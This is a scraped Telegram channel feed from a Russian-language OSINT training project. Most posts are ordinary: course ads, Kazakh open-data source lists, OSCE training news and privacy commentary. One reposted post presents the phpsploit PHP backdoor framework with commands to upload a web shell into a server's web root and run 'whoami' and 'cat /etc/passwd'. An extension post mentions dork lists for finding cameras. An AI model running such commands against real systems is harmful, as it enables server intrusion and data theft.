Bafoмёд OSINT 🇰🇿


Kanal geosi va tili: Rossiya, Ruscha


OSINT-SAN. 2020 жылдан бері OSINT әдістемелеріне оқытатын жоба.
🌐 Сайт: osintsan.ru
❓ Сұрақтар: t.me/bafomed_osint
👨‍💼 Жоба жетекшісі: t.me/satana666mx
📂 Тегін ресурстар: github.com/Bafomet666
osintsan.ru

Bog‘liq kanallar

Kanal geosi va tili
Rossiya, Ruscha
Statistika
Postlar filtri


AI × GEOINT — локальный AI pipeline и практическая GEOINT-аналитика.

Собрал в один комплект материалы по двум направлениям, которые разбирались на прошедшем курсе GEOINT
Это не отдельные фрагменты или короткие видео — внутри полноценные записи лекций и материалы, которые можно использовать как самостоятельную методичку.

🎥 3 видеолекции
Записи live-занятий продолжительностью примерно 40–70 минут.

📄 3 PDF
Презентации и основные материалы лекций.

📚 2 расширенных DOC
Дополнительный материал к лекциям: больше деталей, пояснений, методологии и практических аспектов, чем в самой презентации.

🎁 BONUS — пример GEOINT-отчёта
Полноценный пример итогового аналитического документа — отработанный в рамках материала по GEOINT-отчётности.


Темы лекций:
01 / Local AI Pipeline for OSINT & GEOINT
Архитектура локального AI pipeline и применение AI в OSINT/GEOINT.

02 / AI-GEOINT Pipeline
Street Image Geolocation System: Image → VLLM → LLM → Output
Базовая логика построения системы автоматической геолокации изображений с использованием vision-модели и локального inference.

03 / From Raw Data to GEOINT Report
Как перейти от набора разрозненных данных к структурированному GEOINT-отчёту: сбор → верификация → анализ → выводы → итоговый документ.

Важно: видео — это записи реальных live-лекций, а не специально перезаписанный курс. Монтаж минимальный, сохранены структура, ход занятия и объяснения в исходном формате.

Стоимость комплекта — 3000 ₽


Біз геолокация бойынша іздеуге және тергеу есептерін жасауға көмектесетін құрал жасадық.

Ол іздеу үшін біздің фотосуреттер мен панорамалардың жеке дерекқорымызды пайдаланады.


Bafoмёд OSINT dan repost
Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
Экспериментальная глобальная система распознавания геолокации Open Object Shadows

Первая рабочая тестовая версия, добавляете фото и вам находит точное место, также выдает 10 возможных геолокаций, либо локации с которых было видно само место фотографии.

Система будет определяет точное местонахождение, пока версия 1.0, не такая обширная, но в следующих обновлениях уже начнет искать по улицам вплоть до метра. Через некоторое время станет доступна.

Очень облегчает geosint. Если вам действительно интересна наша технология и вы хотите иметь к такой системе доступ. Тогда присоединяйтесь. https://t.me/+lQ7WobaPK51iYmUy если вдруг вас не добавило. Пишем @bafomed_osint

Без использования внешнего ИИ и крупных моделей. С использование dataset photo.


🇰🇿 OSINT Казахстан: карта открытых источников

Подборка государственных сервисов, реестров и платформ для работы с открытыми данными Казахстана.

🏛 государственные данные
🏢 компании и бизнес
⚖️ суды и право
💰 финансы и закупки
🌐 домены и инфраструктура
🗺 карты и геолокация
🚗 транспорт
👤 цифровой след
🏛 Государственные данные

Open Data Казахстан
🔗 https://data.egov.kz
Государственный каталог открытых наборов данных.

Электронное правительство Казахстана
🔗 https://egov.kz
Государственные сервисы и реестры.

Открытое правительство
🔗 https://open.egov.kz
Открытые данные, обсуждения, отчёты государственных органов.

Бюро национальной статистики
🔗 https://stat.gov.kz
Статистика Казахстана.

Талдау — аналитическая система статистики
🔗 https://taldau.stat.gov.kz
Экономические и социальные показатели.

🏢 Компании и юридические лица
Проверка юридических лиц eGov
🔗 https://egov.kz
Поиск по БИН и названию.

Kompra
🔗 https://kompra.kz
Проверка контрагентов

PK Adаta
🔗 https://pk.adata.kz
Проверка организаций и предпринимателей.

Uchet.kz
🔗 https://pk.uchet.kz
Данные по юридическим лицам.

FA-FA.kz
🔗 https://fa-fa.kz
Грузоперевозки в Казахстане и СНГ

Фонд развития предпринимательства / бизнес-реестры
🔗 https://damu.kz
💰 Государственные закупки

Портал государственных закупок Казахстана
🔗 https://goszakup.gov.kz

⚖️ Судебные данные
Судебный кабинет
🔗 https://office.sud.kz
Судебные дела и документы.

Верховный суд Казахстана
🔗 https://sud.gov.kz
Судебная информация.

Әділет — правовая база
🔗 https://adilet.zan.kz
Законы, нормативные акты, документы.

🧾 Налоги и государственные проверки
Комитет государственных доходов РК
🔗 https://kgd.gov.kz

Проверка налогоплательщика
🔗 https://kgd.gov.kz/ru/services/taxpayer_search

Проверка ограничений и арестов
🔗 https://egov.kz

🏦 Финансы
Национальный банк Казахстана Open Data
🔗 https://data.nationalbank.kz

KASE — Казахстанская фондовая биржа
🔗 https://kase.kz

Депозитарий финансовой отчётности
🔗 https://dfo.kz
Финансовая отчётность организаций.

🌐 Домены и инфраструктура
KazNIC WHOIS / RDAP
🔗 https://rdap.nic.kz

KazNIC
🔗 https://nic.kz
Национальный доменный регистратор.
🗺 Геолокация и карты

Кадастровая карта Казахстана
🔗 https://map.gov4c.kz
Земельные участки и геоданные.

Единый государственный кадастр недвижимости
🔗 https://aisgzk.kz

Google Maps
🔗 https://maps.google.com

Yandex Maps Казахстан
🔗 https://yandex.kz/maps

2GIS Казахстан
🔗 https://2gis.kz

Компании, здания, адреса.
🚗 Автомобили
Kolesa.kz
🔗 https://kolesa.kz
Автомобильные объявления.

Aster.kz
🔗 https://aster.kz
История автомобилей.

Avto.Adata.kz
🔗 https://avto.adata.kz
Проверка авто.

👤 Люди и цифровой след
LinkedIn
🔗 https://linkedin.com
Профессиональные связи.

Telegram
🔗 https://telegram.org
Каналы, группы, публикации.

VK
🔗 https://vk.com
Региональный социальный источник.

Instagram
🔗 https://instagram.com
Публичные профили и геоданные.

📰 СМИ и архивы
Kazinform
🔗 https://inform.kz

Tengrinews
🔗 https://tengrinews.kz

Zakon.kz
🔗 https://zakon.kz

Khabar
🔗 https://khabar.kz

Wayback Machine
🔗 https://web.archive.org
Архив сайтов.

Archive.today
🔗 https://archive.today
📦 Дополнительные базы

OLX Казахстан
🔗 https://olx.kz
Объявления и продавцы.

Kaspi.kz
🔗 https://kaspi.kz
Маркетплейс и бизнес-профили.

HH Казахстан
🔗 https://hh.kz
Вакансии и профессиональные профили.

Rabota.kz
🔗 https://rabota.kz

🇰🇿 Казахстан имеет большое количество открытых источников:
• государственные API;
• бизнес-реестры;
• судебные данные;
• карты;
• финансовые отчёты;
• доменные данные;
• СМИ.

OSINT начинается не с «секретных баз», а с правильного использования уже опубликованной информации.
Данные меняются.
Источники меняются.
Методология остаётся.

🔗 OSINT-SAN 🇰🇿


05 / Развитие направления носит системный характер
Курс по OSINT в Казахстане не был единичным мероприятием.
С 2021 года ОБСЕ реализует программу Capacity Building on Combating Cybercrime in Central Asia, направленную на развитие компетенций в области противодействия киберпреступности.
В рамках программы проводятся обучения по направлениям:
• цифровые доказательства;
• интернет-расследования;
• OSINT;
• анализ криптовалютных операций;
• расследование активности в Dark Web.²
После курса по OSINT в Казахстане также проходили дополнительные мероприятия по киберпреступности и цифровым доказательствам.³


Развитие OSINT в Казахстане — это не просто интерес отдельных энтузиастов.
Открытые источники постепенно становятся частью профессиональной подготовки специалистов, работающих с цифровыми расследованиями и анализом информации.
На этом фоне развиваются и независимые образовательные проекты.


OSINT-SAN — образовательный проект, который с 2020 года занимается развитием направления OSINT и обучением практической работе с открытыми источниками.
Если международные организации формируют стандарты подготовки специалистов, то независимые проекты помогают сделать эти знания доступными для более широкого профессионального сообщества.
Инструменты меняются.
Методология остается.

Источники:
¹ OSCE — OSCE delivers training on open-source intelligence and online investigations to law enforcement representatives from Kazakhstan and Tajikistan
https://www.osce.org/secretariat/568753
² OSCE — OSCE organizes training course on internet investigations and open source intelligence in Central Asia
https://www.osce.org/secretariat/507764
³ OSCE — OSCE conducts training on cybercrime and digital evidence in Kazakhstan
https://www.osce.org/secretariat/569142


🇰🇿 Казахстан и OSINT: как открытая разведка становится частью цифровых расследований

В последние годы термин OSINT (Open Source Intelligence) всё чаще выходит за пределы профессионального сообщества специалистов по кибербезопасности.
Сегодня OSINT используется не только журналистами и независимыми исследователями, но и специалистами по Threat Intelligence, корпоративной безопасности, финансовым расследованиям и правоохранительными структурами.
Насколько это актуально для Казахстана?
Разберёмся на основе открытых источников.

01 / Международные программы обучения OSINT
OSINT в Казахстане постепенно становится частью профессиональной подготовки специалистов.
С 13 по 17 мая 2024 года Академия правоохранительных органов при Генеральной прокуратуре Республики Казахстан совместно с Секретариатом ОБСЕ провела международный семинар:
«Сбор и анализ информации из открытых источников (OSINT)».
В обучении приняли участие более 20 представителей правоохранительных органов Казахстана и Таджикистана.¹
Программа была направлена не на изучение отдельных сервисов, а на формирование системного подхода к работе с открытыми источниками.

02 / OSINT — это методология, а не набор инструментов
Одна из главных ошибок начинающих специалистов — воспринимать OSINT как список сервисов и поисковых операторов.
Однако современные подходы делают акцент именно на методологии.
Эксперт ОБСЕ Витянис Бенетис отметил:
"Open-source intelligence is a fast-evolving field, which makes it challenging for criminal justice practitioners to keep up with the latest tools and technologies. This course provides participants with an overall framework and methodology to conduct online investigations, independent of particular tools that constantly change."¹

Авторский перевод:
«OSINT — это быстро развивающаяся область, где специалистам сложно постоянно отслеживать новые инструменты и технологии. Именно поэтому курс предоставляет общую структуру и методологию проведения онлайн-расследований, независимо от конкретных инструментов, которые постоянно меняются».

Главный вывод:
Инструменты устаревают. Методология остается.
Хороший OSINT-аналитик определяется не количеством сохранённых сервисов, а способностью:
• находить данные;
• проверять их достоверность;
• устанавливать связи;
• формировать аналитические выводы.

03 / OSINT как часть цифровых расследований
На открытии курса вице-ректор Академии правоохранительных органов Республики Казахстан Маралбек Ешимов отметил:
"The wealth of information available online can significantly aid the investigation of virtually any criminal case and make the work of police more effective and efficient."¹

Авторский перевод:
«Огромный объём информации, доступной в интернете, способен существенно помочь расследованию практически любого уголовного дела и сделать работу правоохранительных органов более эффективной».

Сегодня цифровой след становится одним из ключевых источников информации.
Открытые данные могут включать:
• социальные сети;
• доменные данные;
• публикации и архивы;
• фотографии и метаданные;
• корпоративные связи;
• цифровую инфраструктуру;
• географическую информацию.
Но сами данные не являются разведывательной информацией.
Разведывательной информацией они становятся после анализа.

04 / Что именно изучали участники курса
Согласно официальному описанию программы ОБСЕ, участники изучали:¹
• процесс проведения OSINT-расследований;
• основы работы с Web и Internet;
• OPSEC при проведении онлайн-расследований;
• анализ веб-сайтов;
• исследование электронной почты;
• анализ социальных сетей;
• анализ изображений;
• сохранение цифровых доказательств;
• вопросы прав человека при проведении онлайн-расследований.
Обратите внимание:
В программе нет концепции «секретных инструментов» или «волшебных сервисов».
Основной фокус — процесс расследования, аналитическое мышление и корректная работа с информацией.


Несмотря на то, что Telegram блокируют, я не собираюсь никуда уходить. Продолжаю развивать свой TG-канал, и поэтому собрался с такими же неравнодушными авторами в папку: ТИПИ-COMPANY. Заглядывайте, ребят, оно того стоит.

Кто внутри папки
Проводники в мир IT: 😎 защита данных, отражение атак и классные проекты
💍 Практики кибербеза: Анализ защиты, прямые эфиры, важнейшие новости: Google подаёт в суд на мошенников, с помощью Gemini были обмануты 100.000 человек.
⚡️ OSINT и анонимность: всё в теме от А до Я! Лайфхаки анонимности, заметки с расследований и многое другое

🦅Если тоже решил остаться в TG — заглядывай в ПАПКУ и оставайся с нами


Карта всех свидетельств очевидцев явлений летающих явлений, пришельцев. OSINT пришельцев

Необычно https://nuforc.org/map/ тем более я сам своего рода рептилойд


На авито мужик выложил стойку, по очень выгодной цене. Можно начинать копить, к 2840г накопите.

Стойка


Инструменты OSINT для социальных сетей

Cоциальные сети - это практически бездонный источник информации, который практически любой может использовать для исследований в области безопасности и разведки. Эти платформы позволяют любому человеку узнать больше о других людях, их интересах, опыте и связях, а организации могут легко изучить сайты, чтобы получить информацию о настроениях клиентов или предсказать поведение потребителей.

К сожалению стоит отметить, что сами платформы интенсивно торгуют данными для таргетирования рекламы и данные эти часто попадают не только рекламщикам...

1. Sherlock

Sherlock - это инструмент командной строки с открытым исходным кодом, ищет определенное имя пользователя в наиболее популярных социальных сетях и выдает ссылки на профили. У него нет интерфейса, и доступ к нему осуществляется через командный терминал Windows, Linux или MacOS.

https://github.com/sherlock-project/sherlock#installation


Жизнь по ту сторону закона привела к жестокому финалу.

Один из заметных участников подпольной площадки Kingdom Market, где продавали наркотики, украденные финансовые данные и вредоносные программы, проведёт в американской тюрьме более 16 лет. Приговор стал продолжением международной операции, в ходе которой силовики закрыли крупный маркетплейс в даркнете и получили доступ к его серверам.

33-летний гражданин Словакии Алан Билл признал вину ещё в январе. Следствие связывало его с заговором по распространению контролируемых веществ и работой Kingdom Market, действовавшего с марта 2021 года по декабрь 2023 года. Билла задержали 15 декабря 2023 года в аэропорту Ньюарка, после чего немецкие правоохранители изъяли серверы площадки и остановили её работу. Самого же Билла экстрадировали в США.

По версии прокуратуры, Билл помогал поддерживать Kingdom Market технически и организационно. Он создавал страницы на форумах и в соцсетях, публиковал сообщения от имени площадки, участвовал в посредничестве по отдельным сделкам и получал оплату в криптовалюте.

Kingdom Market использовали продавцы наркотиков и киберпреступники. На площадке размещали предложения о продаже различных запрещённых веществ, поддельных документов, фальшивых денег, украденных платёжных данных и вредоносного ПО.

https://www.justice.gov/usao-edmo/pr/slovakian-administrator-darknet-market-sold-drugs-and-stolen-personal-information




VPN в публичном Wi-Fi: что защищает данные в кафе, отеле и аэропорту
Публичный Wi-Fi в кафе, аэропорту или отеле уже не так опасен, как десять-пятнадцать лет назад. Главная причина простая: большинство сайтов и приложений давно используют HTTPS, а значит сосед за соседним столиком обычно не сможет прочитать ваш пароль, переписку или номер карты простым перехватом пакетов. Американская FTC прямо пишет, что из-за широкого внедрения шифрования подключение к публичным сетям обычно безопаснее, чем принято считать.
Но фраза «обычно безопаснее» не равна «можно расслабиться». VPN всё ещё полезен в поездках, особенно когда сеть неизвестная, точка доступа выглядит сомнительно, на ноутбуке работают рабочие сервисы, а часть трафика уходит через старые приложения, DNS или корпоративные инструменты. VPN не превращает плохую сеть в доверенную, не спасает от фишинга и не делает человека анонимным, зато закрывает важный участок между вашим устройством и VPN-сервером.


С 8 мая 2026 года Instagram отключает поддержку end-to-end encryption (E2EE) в Direct Messages.

Раньше в Instagram была опциональная функция "Секретные чаты" / "End-to-end encrypted chats" (введена в 2023 году).
С 8 мая 2026 эта функция полностью удалена.
Теперь все переписки в Instagram DM не имеют сквозного шифрования.

С мая Instagram станет стал гораздо более уязвимым для перехвата в странах с СОРМ-подобными системами.
Почему так:

Instagram никогда не имел E2EE по умолчанию Раньше была хотя бы опциональная возможность включить сквозное шифрование. Теперь её убрали полностью.

Meta (как компания) подчиняется местному законодательству В странах, где есть мощные системы слежки (Россия, Беларусь, Китай, Иран, Узбекистан, Казахстан, Таджикистан и др.), Meta будет предоставлять доступ к перепискам по официальным запросам.

СОРМ в России Роскомнадзор и ФСБ уже давно требуют от иностранных сервисов (включая Meta) предоставлять доступ к переписке. После отключения E2EE технических препятствий почти не осталось.






Bafoмёд OSINT dan repost
🎯 OSINT Search — расширение для тотального разведпоиска.

💡 Что это такое?
Браузерное расширение, которое превращает новую вкладку в мощный инструмент для OSINT-анализа (разведки по открытым источникам). Упаковано всё в удобный интерфейс с кнопками, историями, dork-запросами и геопоиском.

🔧 Возможности:
✅ Google Dorks в 1 клик
✅ Мгновенный поиск по:

Google, Yandex, DuckDuckGo, Bing и др.

Shodan, ZoomEye, Censys — для IP и камер

Google Maps, OpenStreetMap, Wikimapia — для координат
✅ Мои сайты — список избранных, с иконками и быстрым доступом
✅ История запросов — кликабельна, не теряется
✅ Filetype-фильтры — PDF, XLS, TXT, DOC
✅ Кнопки для камер — dork-списки камер по брендам
✅ Whois по домену — через локальный сервер (Python)
✅ Показ твоего IP + гео — автоматом при открытии

Попробовать бета версию - https://addons.mozilla.org/ru/firefox/addon/osint-search/


Bafoмёд OSINT dan repost
stop_shtraf.rar
437.9Kb
Написали небольшое расширение для блокировки экстремистских сайтов. Блокирует и подсвечивает красным и не дает перейти на сайт, по ключевым словам и доменам. Пока бета версия.

Пока только для firefox.

Заходим на: about:debugging#/runtime/this-firefox

Добавить временное расширение.
Указываем manifest.json и все расширение подключено.

github: https://github.com/Bafomet666/shtaf

В файлах badlist там сайты для блокировки,
В badworlds список экстремистских ключевых фраз. Там можно указать свое, я взял с gov, официальный список. Что бы не нароком штраф не получить.

Код весь открыт, это бета тестируем, смотрим код. Думаю когда уже полноценно допишем, будем очень полезно и бесплатно.


Codeby dan repost
phpsploit: Мощный фреймворк для пентеста PHP-приложений

phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.


❓Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.

⬇️Установка и использование:

1️⃣ Установка phpsploit:
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit

2️⃣ Настройка подключения:
set TARGET http://example.com/vulnerable.php
set BACKDOOR
run exploit

3️⃣ Основные команды:
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями

4️⃣ Пример эксплуатации:
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html

Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров


SCAMSHOT dan repost
Ахахахаха, у MAX-а, помимо того что это Там-там с функцией слежки, еще и библиотеки взяты у недружественных России стран:

Чикаго, США
https://github.com/bluelinelabs/Conductor
Варшава, Польша
https://github.com/FutureMind/recycler-fast-scroll
Питтсбург, США
https://github.com/JakeWharton/ProcessPhoenix

И вишенка на торте - не проходите мимо, задержите дыхание
https://github.com/Yalantis/uCrop

Интернациональная компания. Смотрим офисы:
https://yalantis.com/company/#who_we_are

Топ контрибьюторов https://github.com/Yalantis/uCrop/graphs/contributors :

Топ 1: https://github.com/shliama Krootl Ukraine
Топ 2: https://github.com/Legementarion Dnipro
Топ 4: https://github.com/p1nkydev Raiffeisen Bank Ukraine Ukraine

А еще этот мессенджер, мало того что с последним обновлением имеет полный доступ к буферу обмена, так еще и устанавливаемый с RuStore зачем-то отправляет куда-то инфу обо всех установленных приложениях на Android.

Безопасный национальный мессенджер, дамы и господа, с привязкой к Госуслугам и утечкой данных непосредственно в те самые днепрские офисы - чтобы им, надо полагать, было удобней.

20 ta oxirgi post ko‘rsatilgan.